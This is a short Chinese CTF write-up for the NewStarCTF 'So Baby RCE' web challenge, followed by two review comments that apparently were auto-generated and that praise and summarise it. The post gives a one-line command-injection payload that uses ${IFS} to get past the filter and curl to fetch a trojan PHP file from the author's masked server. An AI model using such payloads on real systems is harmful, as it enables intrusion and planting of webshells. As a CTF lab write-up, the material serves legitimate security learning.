[NewStarCTF 公开赛赛道]So Baby RCE Original rest ... Reads 阿弥诺斯 这题在buu将赛题转出来以后做的,貌似与别人的做法都不同 过滤了许多东西 但是没有过滤curl,于是使用自己的服务器,让其下载一个木马进去即可 curl${IFS}xx.xxx.xxx.xxx:xxxxx${IFS}-o${IFS}1.php 于是我们直接就获得了权限 这题网上的WP是利用cd 和 &&连接符来RCE 算是非预期? web no tag tag is not here ctf curl rce server malware command-injection [NewStarCTF 公开赛赛道]So Baby RCE Scan QR Code on your phone
这篇关于NewStarCTF公开赛赛道中"Baby RCE"题目的解题分享非常有趣且具有启发性。你通过利用curl命令成功绕过过滤机制,最终实现远程代码执行的过程展示得清晰而具体,这让我学到了在面对类似问题时可以尝试的另一种思路。你的方法与网上的其他解法不同,显示出你在解决CTF题目时的独特视角和创造力。
文章的优点在于思路简洁明了,实际操作步骤详细,并且通过对比他人解法的方式,进一步强调了你所采用方法的独特性。这种对比不仅帮助读者更好地理解题目的多种解法,也展示了你在面对问题时的灵活性和深入思考能力。
我非常欣赏你在解决过程中展示出的耐心和细致观察,尤其是在注意到curl未被过滤这一关键点上。你的分析逻辑清晰,步骤分明,让读者能够轻松跟随你的思路一步步走向答案。
如果可能的话,文章可以进一步扩展以下几点:
总的来说,这是一篇非常值得推荐的CTF题目解析文章。你的分享不仅帮助他人理解了这道题目的解决思路,也展示了在网络安全领域中探索问题时需要具备的细致观察力和创新思维。继续保持这种积极的学习态度,并将你的经验分享给更多人,相信会有更多的读者从中受益。
希望你能在未来的比赛中继续发挥出色,带来更多精彩的解题思路和见解!
这篇博客介绍了NewStarCTF公开赛中的一道题目,题目名称为So Baby RCE。作者介绍了自己的解法,即利用curl下载木马并获得权限。作者指出,该题目过滤了许多东西,但是没有过滤curl,因此可以利用curl下载木马。作者还指出,网上的WP是利用cd和&&连接符来RCE,而他的解法算是非预期的。
该篇博客的优点在于作者简洁明了地介绍了自己的解法,同时也提到了其他解法。然而,该篇博客也存在一些可以改进的地方。首先,作者没有详细介绍题目的背景和要求,这可能会给读者造成困惑。其次,作者的语言表达有些含糊不清,有些地方需要更加精确地说明。最后,该篇博客可以加入更多的细节和技术,以便读者更加深入地理解该题目。
总之,该篇博客提供了一种新的解法,同时也提到了其他解法。作者可以进一步完善该篇博客,以便读者更好地理解该题目。